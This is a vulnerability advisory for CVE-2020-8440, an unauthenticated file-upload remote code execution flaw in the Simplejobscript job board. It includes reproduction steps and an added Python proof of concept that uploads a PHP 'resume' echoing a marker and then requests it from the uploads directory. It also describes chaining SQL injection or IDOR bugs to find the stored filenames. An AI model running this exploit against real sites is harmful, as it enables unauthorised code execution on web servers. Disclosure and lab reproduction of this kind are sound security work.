CVE-2020-8440
controllers/page_apply.php in Simplejobscript.com SJS through 1.66 is prone to unauthenticated Remote Code Execution by uploading a PHP script as a resume.
- mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8440
- public announcement: https://github.com/niteosoft/simplejobscript/issues/10
Description:
controllers/page_apply.php in simplejobscript.com SJS <= 1.66 is prone to unauthenticated Remote Code Execution: the resume upload on the public application form accepts a PHP script, which is then stored in a web-accessible directory and executed when requested.
Details:
File: /controllers/page_apply.php
URL: /apply
Parameter: cv
Steps to Reproduce:
1/ Apply for a job via /apply and attach a PHP file as your resume (the cv upload field); the file is accepted and stored as-is
2/ Browse the upload directory http://local.simplejobscript.net/uploads/cvs/ to find the stored filename
3/ Request the PHP file; the web server executes it, giving code execution as the web server user
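The three steps above, driven end to end against a lab instance, as an added example (this is not the original advisory's PoC and not SJS project code). It assumes the /apply form is an ordinary multipart/form-data POST and that the uploaded file keeps its .php extension; the non-file form field names (job_id, name, email) are invented for illustration and must be taken from the real form. The uploaded script only echoes a random marker, which is enough to prove server-side execution without giving anyone a shell.

```python
"""Added example: reproduce CVE-2020-8440 against a lab install of SJS <= 1.66.

Not part of the original advisory. Assumed (not stated on the page):
the /apply form is a plain multipart POST, the text field names below
are placeholders, and the stored file keeps its .php extension.
"""
import html
import re
import sys
import urllib.request
import uuid

# Harmless marker payload: proves execution, does nothing else.
MARKER = "SJS-8440-" + uuid.uuid4().hex[:8]
PAYLOAD = f"<?php echo '{MARKER}'; ?>".encode()


def build_multipart(fields, file_field, filename, content, boundary=None):
    """Encode text fields plus one file part as multipart/form-data.

    Returns (body_bytes, content_type_header_value)."""
    boundary = boundary or "----sjs" + uuid.uuid4().hex
    parts = []
    for name, value in fields.items():
        parts.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
            f"{value}\r\n".encode()
        )
    parts.append(
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{file_field}"; '
        f'filename="{filename}"\r\n'
        f"Content-Type: application/octet-stream\r\n\r\n".encode()
        + content + b"\r\n"
    )
    parts.append(f"--{boundary}--\r\n".encode())
    return b"".join(parts), f"multipart/form-data; boundary={boundary}"


def find_php_uploads(listing_html):
    """Step 2: pull *.php entries out of an Apache/nginx autoindex page.

    Skips sort links (?C=N;O=D) and directory links (contain '/')."""
    names = re.findall(r'href="([^"?/]+\.php)"', listing_html, re.IGNORECASE)
    return sorted({html.unescape(n) for n in names})


def fetch(url):
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def apply_with_php_resume(base_url, fields, filename="resume.php"):
    """Step 1: POST the application with a PHP file in the 'cv' field."""
    body, ctype = build_multipart(fields, "cv", filename, PAYLOAD)
    req = urllib.request.Request(
        base_url + "/apply", data=body, method="POST",
        headers={"Content-Type": ctype},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def main(base_url):
    # Placeholder field names: read the real ones from the /apply form.
    fields = {"job_id": "1", "name": "Test Applicant",
              "email": "applicant@example.com"}
    apply_with_php_resume(base_url, fields)

    listing = fetch(base_url + "/uploads/cvs/")
    candidates = find_php_uploads(listing)
    if not candidates:
        print("no .php file listed: indexing off or upload rejected")
        return False

    # Step 3: request each candidate; the marker in the body proves execution.
    for name in candidates:
        if MARKER in fetch(base_url + "/uploads/cvs/" + name):
            print("code executed via", name)
            return True
    print("file stored but marker not echoed (PHP not executed in uploads/?)")
    return False


if __name__ == "__main__":
    sys.exit(0 if main(sys.argv[1].rstrip("/")) else 1)
```

Run it as `python3 poc.py http://local.simplejobscript.net`. If the listing step returns nothing, directory indexing is off and the filename has to be recovered another way (see the notes below); if the file is listed but the marker is not echoed, the server is not executing PHP from the upload directory, which is the correct hardening for this bug along with rejecting non-document extensions in page_apply.php.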
Additional information:
If you can't see the content of the upload directory (directory indexing is off), it can be hard to guess the final filename of your malicious resume because of the uniqid generated. Note that if this is PHP's uniqid(), the value is derived from the current time (seconds and microseconds in hex) rather than from a CSPRNG, so it raises the cost of guessing but does not prevent it.
However, you can use one of the multiple SQL injections (CVE-2020-7229) to read the content of the applicant table, or one of the multiple IDORs to access all applications of all companies; either path reveals the stored resume filenames.
PoC: